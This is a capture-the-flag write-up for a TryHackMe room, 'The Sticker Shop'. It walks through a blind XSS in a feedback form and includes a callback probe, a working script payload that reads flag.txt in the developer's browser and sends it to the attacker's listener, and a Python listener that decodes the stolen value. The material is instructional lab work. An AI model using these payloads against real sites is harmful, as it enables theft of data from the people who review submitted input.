TryHackMe: The Sticker Shop - Blind XSS Writeup

Naufal Ardhani
3 min read · Jan 21, 2025


The Sticker Shop is a machine in the web exploitation category, created by @toxicat0r, and it can be accessed for free on TryHackMe.

From the room description, “Can you exploit the sticker shop in order to capture the flag?”, I thought this would be a challenge around something like a rate limit or a mass assignment vulnerability.

Starting the machine and reading the Task 1 description, we learn that the shop is hosted on the same computer the developer works on. We are then asked to read the flag at IP:PORT/flag.txt.

Recon

Requesting IP:PORT/flag.txt returns “401 Unauthorized”: the file is served by the web application, but our request is not authorised to read it.

This is the main page. It only contains static content; there is no interaction with the server at all.

On the feedback page there is a text input and a submit button for sending feedback to the developer (admin).

Checking the page source (view-source:) confirms that the form really does send the input to the server in a POST request.

Exploitation

From my experience playing CTFs, challenges like this are usually blind XSS: our input is never reflected back to us, but it is rendered somewhere we cannot see, here in the developer's browser when the feedback is reviewed. The only way to confirm it is to make the payload call back to a server we control.

Start with a basic callback payload like this:

<script>fetch('http://ip:port/is_blind?');</script>

Before that we need to know our IP on the TryHackMe VPN and start a local HTTP server that the machine can reach. I use Python's http.server.

Find TryHackMe IP

My IP is 10.21.24.211.

The local server is now running on port 1337 and ready to receive callbacks.
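A plain `python3 -m http.server 1337` is enough for the callback, since the hit appears in its access log. As an added example (not the author's setup), here is a small stand-in listener that additionally decodes a `?flag=` parameter, so the exfiltrated value is printed readably instead of percent-encoded in the log. The port 1337, the `flag` parameter name and the `/is_blind?` probe path are assumptions taken from the payloads in this write-up.

```python
#!/usr/bin/env python3
"""Minimal blind-XSS callback listener (added example, not the original
write-up's setup). Stand-in for `python3 -m http.server 1337`: it answers
every GET, logs the client IP and path, and decodes a ?flag= parameter
so an exfiltrated value is readable instead of URL-encoded in the log."""
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Optional
from urllib.parse import parse_qs, urlparse

LISTEN_PORT = 1337  # assumed: matches the port used in the payloads above


def extract_flag(path: str, param: str = "flag") -> Optional[str]:
    """Return the decoded value of ?flag=... from a request path, or None.

    parse_qs already applies percent-decoding, so a browser-side
    encodeURIComponent('THM{...}') arrives as THM%7B...%7D and comes
    back out as THM{...}. A bare probe such as /is_blind? yields None.
    """
    query = parse_qs(urlparse(path).query)
    values = query.get(param)
    return values[0] if values else None


class CallbackHandler(BaseHTTPRequestHandler):
    def do_GET(self) -> None:
        client_ip = self.client_address[0]  # the victim's (developer's) address
        flag = extract_flag(self.path)
        if flag is not None:
            print(f"[+] {client_ip} exfiltrated: {flag}")
        else:
            # e.g. the /is_blind? probe: the hit alone proves the script ran
            print(f"[*] {client_ip} requested {self.path}")
        # 204 keeps the response tiny. The victim browser cannot read it
        # anyway (cross-origin fetch); the request reaching us is what matters.
        self.send_response(204)
        self.end_headers()

    def log_message(self, fmt, *args) -> None:
        # silence the default access log; we print our own lines above
        pass


def main() -> None:
    HTTPServer(("0.0.0.0", LISTEN_PORT), CallbackHandler).serve_forever()


if __name__ == "__main__":
    main()
```

Run it with `python3 listener.py` on the attacking host before submitting the feedback; the decoded flag is printed the moment the developer's browser executes the second payload.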

<script>fetch('http://10.21.24.211:1337/is_blind?');</script>

After clicking submit we get the message “Thanks for your feedback! It will be evaluated shortly by our staff”.

And yes, this is a genuine blind XSS: our local server receives a request from the machine's IP, which means the developer's browser rendered our feedback and executed the script.

Next, to read flag.txt we ride the developer's session: the same blind XSS in the feedback feature runs our script inside the developer's browser, which, unlike us, is authorised to fetch flag.txt. Two things have to hold for this to work. The fetch of flag.txt must be same-origin with the page the developer is viewing (or permitted by CORS), otherwise the browser will make the request but refuse to hand the body to our script. The second fetch, to our listener, is cross-origin and its response is unreadable, but we only need that request to arrive, not to be read.

Below is the complete payload to read flag.txt and send it to our listener.

<script>
  // Runs in the developer's browser, which sits on the same host as the shop
  // and is allowed to read flag.txt (from outside we only get 401).
  fetch('http://machine_ip:8080/flag.txt')
    .then(response => response.text())
    .then(flag => {
      // Ship the flag to our listener in the query string. encodeURIComponent
      // keeps braces and spaces intact; the response is cross-origin and
      // unreadable, but the request itself still reaches us.
      fetch(`http://your_ip:your_port/?flag=${encodeURIComponent(flag)}`);
    })
    // Only visible in the victim's console, never to us: if nothing arrives,
    // suspect the first fetch (wrong origin, CORS) rather than the listener.
    .catch(error => console.error('Error:', error));
</script>

Submit the feedback form again with this payload, watch the listener, and the flag arrives in the query string of the callback request.


Written by Naufal Ardhani

Offensive Security | Penetration Tester | CTF Player 🇮🇩
